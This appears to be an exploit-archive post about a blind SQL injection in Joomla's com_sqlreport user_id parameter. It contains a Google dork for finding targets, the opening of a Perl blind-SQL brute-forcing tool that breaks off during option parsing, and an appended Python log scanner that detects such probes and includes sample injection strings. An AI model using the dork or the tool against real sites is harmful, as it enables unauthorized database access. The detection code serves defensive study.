
Joomla user_id com_sqlreport Component Blind SQL Injection Vulnerability

Posted: 2010-02-26 14:49:24   Views: 153

# Title: Joomla Component user_id com_sqlreport Blind SQL Injection Vulnerability

# EDB-ID: 11549

# CVE-ID: ()

# OSVDB-ID: ()

# Author: Snakespc

# Published: 2010-02-23

# Verified: no

==============================================================================
[»]Joomla Component user_id com_sqlreport Blind SQL Injection Vulnerability
==============================================================================

[»] Script:   [Joomla]
[»] Language: [ PHP ]
[»] Founder:  [ Snakespc Email:super_cristal@hotmail.com - Site:sec-war.com/cc ]
[»] Greetz to:[ sec-warTeaM, PrEdAtOr ,alnjm33 >>> All My Member >> sec-war.com/cc ]
[»] Dork:inurl:"com_sqlreport"

###########################################################################
===[ Exploit ]===POC Blind Joomla (user_id) com_sqlreport >>>>Note: place in the folder C:\Perl\bin\snakespc.pl
###########################################################################

#!/usr/bin/perl
use LWP::UserAgent;
use Getopt::Long;
use IO::Handle;
use strict;
$| = 1;

###############################################################################
my $default_debug = 0;
my $default_length = 32;
my $default_method = "GET";
my $default_time = 0;
my $version = "1.1";
my $default_useragent = "bsqlbf $version";
my $default_dict = "dict.txt";
my $default_sql = "version()";
###############################################################################

$| = 1;

my ($args, $abc, $solution);
my ($string, $char, @dic);
my (%vars, @varsb);
my ($lastvar, $lastval);
my ($scheme, $authority, $path, $query, $fragment);
my $hits = 0;
my $usedict = 0;
my $amatch = 0;
my ($ua, $req);

###############################################################################
#Define GetOpt:
my ($url, $sql, $time, $rtime, $match, $uagent, $charset, $debug);
my ($proxy, $proxy_user, $proxy_pass, $rproxy, $ruagent);
my ($dict, $start, $length, $method, $cookie, $blind);
my ($help, $bincharset, $get, $nodict);

my $options = GetOptions (
  'help!'            => \$help,
  'url=s'            => \$url,
  'get=s'            => \$get,
  'sql=s'            => \$sql,
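A defender-side check for the traffic this script would generate, as an added example that is not part of the original advisory or the author's code: it scans web access logs for requests to com_sqlreport whose user_id is not a plain integer, and for the script's default "bsqlbf" User-Agent. The Combined Log Format, the /index.php?option=com_sqlreport URL shape, the numeric user_id rule, the burst threshold and all sample lines are assumptions constructed for illustration.

```python
import re
from collections import Counter
from urllib.parse import urlsplit, parse_qs

# Combined Log Format (assumed): ip - - [ts] "METHOD url PROTO" status size "ref" "ua"
LOG_RE = re.compile(r'^(?P<ip>\S+) \S+ \S+ \[[^\]]+\] "\S+ (?P<url>\S+) [^"]*" '
                    r'\d{3} \S+ "[^"]*" "(?P<ua>[^"]*)"$')

def classify(line):
    """Return (ip, reasons) for one log line, or None if it does not parse."""
    m = LOG_RE.match(line)
    if not m:
        return None
    reasons = set()
    if m["ua"].lower().startswith("bsqlbf"):   # default UA string in the script
        reasons.add("tool-user-agent")
    query = parse_qs(urlsplit(m["url"]).query, keep_blank_values=True)
    if "com_sqlreport" in query.get("option", []):
        # Assumption: a legitimate user_id is a short decimal integer.
        if any(not re.fullmatch(r"\d{1,10}", v) for v in query.get("user_id", [])):
            reasons.add("non-numeric-user_id")
    return m["ip"], reasons

def suspicious_clients(lines, burst=3):
    """Map client IP -> sorted reasons; 'burst' means >= burst bad user_id hits."""
    found, bad_hits = {}, Counter()
    for parsed in filter(None, map(classify, lines)):
        ip, reasons = parsed
        if reasons:
            found.setdefault(ip, set()).update(reasons)
            bad_hits[ip] += "non-numeric-user_id" in reasons
    for ip, n in bad_hits.items():
        if n >= burst:
            found[ip].add("burst")
    return {ip: sorted(r) for ip, r in found.items()}

def _line(ip, uid, ua, n):  # builds one constructed log line
    return (f'{ip} - - [23/Feb/2010:10:00:0{n} +0000] "GET /index.php?option='
            f'com_sqlreport&user_id={uid} HTTP/1.1" 200 512 "-" "{ua}"')

# Constructed sample traffic (not from the page or any real server).
SAMPLE = ([_line("198.51.100.7", "62", "Mozilla/5.0", 0)]
          + [_line("203.0.113.9", "62%20and%201%3D1", "bsqlbf 1.1", n) for n in (1, 2, 3)]
          + [_line("192.0.2.44", "62%27", "Mozilla/5.0", 4)])

if __name__ == "__main__":
    for ip, why in suspicious_clients(SAMPLE).items():
        print(ip, ", ".join(why))
```

The User-Agent match is the weakest signal because the script accepts a replacement value on the command line; the non-integer user_id check does not depend on it.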
